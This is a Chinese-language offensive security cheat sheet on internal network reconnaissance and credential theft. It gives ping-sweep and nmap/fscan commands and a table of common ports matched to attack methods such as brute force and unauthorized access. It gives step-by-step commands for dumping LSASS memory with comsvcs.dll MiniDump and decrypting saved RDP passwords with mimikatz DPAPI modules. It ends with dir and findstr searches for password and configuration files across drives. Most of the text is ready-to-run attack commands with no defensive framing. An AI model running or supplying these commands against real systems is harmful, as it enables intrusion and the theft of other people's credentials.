2.2_内网IP端口密码抓取

内网IP扫描

ICMP

命令


Windows	`for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.7.%I \| findstr "TTL= #windows"`
Linux	`for k in $( seq 1 255);do ping -c 1 192.168.99.$k\|grep "ttl"\|awk -F "[ :]+" '{print $4}'; done`

工具


`Nmap`（推荐）	`sudo nmap -sn -PR 192.168.142.0/24`
`Fscan` （推荐）	主机发现+端口web服务检测+基础漏洞扫描
`Kscan`	主机发现+端口扫描+协议检测+指纹识别
`Fping`，`nbtscan`，...	其他工具内网扫描工具

ARP

（推荐）


命令	Windows/Linux：`arp -a`
工具	CS的端口扫描

NTBIOS


命令	Linux：`nbtscan -r 目标IP范围` `nbtscan -r 192.168.1.1-254`
工具	CS的端口扫描

内网端口扫描

扫描

命令 kali - telnet 快速检测单个端口有没有开放，例：telnet 192.168.142.128 80

工具


`Nmap` （推荐）	`nmap -sV -p- 192.168.110.151`
`Fscan` （推荐）	端口web服务检测+基础漏洞扫描
`Kscan`	主机发现+端口扫描+协议检测+指纹识别

常见端口及描述


端口号	端口服务	利用方式
21,22,69	FTP文件传输协议	允许匿名的上传，下载，爆破和嗅探操作
22	SSH远程连接	爆破，SSH隧道及内网代理转发，文件传输
23	Telnet 远程连接	爆破，嗅探，弱口令
25	SMTP 邮件服务	邮件伪造
53	DNS 域名系统	允许区域传送，DNS劫持，缓存投毒，欺骗
67,68	DHCP 服务	劫持，欺骗
80,443,8080	常见的 Web 服务端口	Web 攻击，爆破，对应服务器版本漏洞
110	POP3协议	爆破，嗅探
139	NTBIOS 服务	爆破，未授权访问，远程代码执行
512,513,514	Linux rexec 服务畴	爆破，远程登录
873	rsync 服务	匿名访问，文件上传
1352	Lotus Domino 邮件服务	弱口令，信息泄露，爆破
1433	MSSQL 数据库	注入，提权，爆破
1521	Oracle 数据库	注入，反弹shell
2049	NFS 服务	配置不当
2181	ZooKeeper 服务	未授权访问
2375	Docker 服务	未授权访问
3306	MySQL 数据库	注入，提权，爆破
3389	Telnet 远程连接	爆破，嗅探，弱口令
3690	SVN 服务	SVN 泄露，未授权访问
4848	GlassFish 控制台	弱口令
5432	Post greSQL 数据库	爆破，注入，弱口令
5900，5901	VNC	弱口令爆破，未授权访问
5984	CouchDB	未授权访问
6379	redis	未授权访问
7001	Weblogic	Weblogic 漏洞
8069	Zabbix 服务	远程执行，SQL注入
8080,8090	JBoss/Resin/Jetty/Jenkins	反序列化，控制台弱口令
9090	WebSphere 控制台	Java 反序列化，弱口令
9200,9300	EI asticsearcb 服务	远程执行
10000	webmin 控制面板	弱口令
11211	Memcached 服务	未授权访问
27017,27018	MongoDB 数据库	爆破，未授权访问
50000	SAP Management Console	远程执行

RDP 明文密码读取

当用户点击了记住我的凭据，我们可以对保存的密码进行还原


查看凭据	被连接主机查看mstsc的连接记录：`cmdkey /list` 查找本地的凭据文件：`dir /a %userprofile%\appdata\local\microsoft\credentials\*` 得到其凭据文件路径（绝对路径和文件名进行拼接）（记录）（记得更改用户名）：`C:\Users\admin\appdata\local\microsoft\credentials\DFBE70A7E5CC19A398EBF1B96859CE5D`
在线读取	目标主机查看其 `guidMasterKey`：`mimikatz dpapi::cred /in:凭据文件路径` 将凭据载入到内存：`mimikatz sekurlsa::minidump lsass.dmp` 获取其 GUID：`dpapi::cred /in:凭据文件路径` 找到内存中对应的MasterKey（记录）： `sekurlsa::dpapi` 解密凭证文件：`dpapi::cred /in:凭据文件路径 /masterkey:masterkey值` CredentialBlob 出显示密码
离线读取	查看lsass.exe进程PID: `tasklist \| findstr lsass.exe` 使用powershell 导出 lsass (需管理员权限)： `powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\Users\lenovo\Desktop\lsass.dmp full` win10 使用导出 lsass (需管理员权限)：`powershell -c 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full'` 将 `lsass.dmp` 下载到本地 ↑ 下载其凭证操作 ↑ (若其隐藏：查看 -> 选项 -> 查看 -> 取消勾选隐藏受保护的操作系统文件(推荐) ) 将凭据载入到内存：`mimikatz sekurlsa::minidump lsass.dmp` 获取其 GUIDMasterKey：`dpapi::cred /in:凭据文件路径` 找到内存中对应的MasterKey（记录）： `sekurlsa::dpapi` 解密凭证文件：`dpapi::cred /in:凭据文件路径 /masterkey:masterkey值` CredentialBlob 出显示密码

软件密码抓取工具


类型	工具
浏览器密码	Sharp-HackBrowserData
Finallshell	FinalShell-Decoder

其他信息收集命令

# 指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt" 
dir /a /s /b d:\"*.xml" 
dir /a /s /b d:\"*.mdb" 
dir /a /s /b d:\"*.sql" 
dir /a /s /b d:\"*.mdf" 
dir /a /s /b d:\"*.eml" 
dir /a /s /b d:\"*.pst" 
dir /a /s /b d:\"*conf*" 
dir /a /s /b d:\"*bak*" 
dir /a /s /b d:\"*pwd*" 
dir /a /s /b d:\"*pass*" 
dir /a /s /b d:\"*login*" 
dir /a# 指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak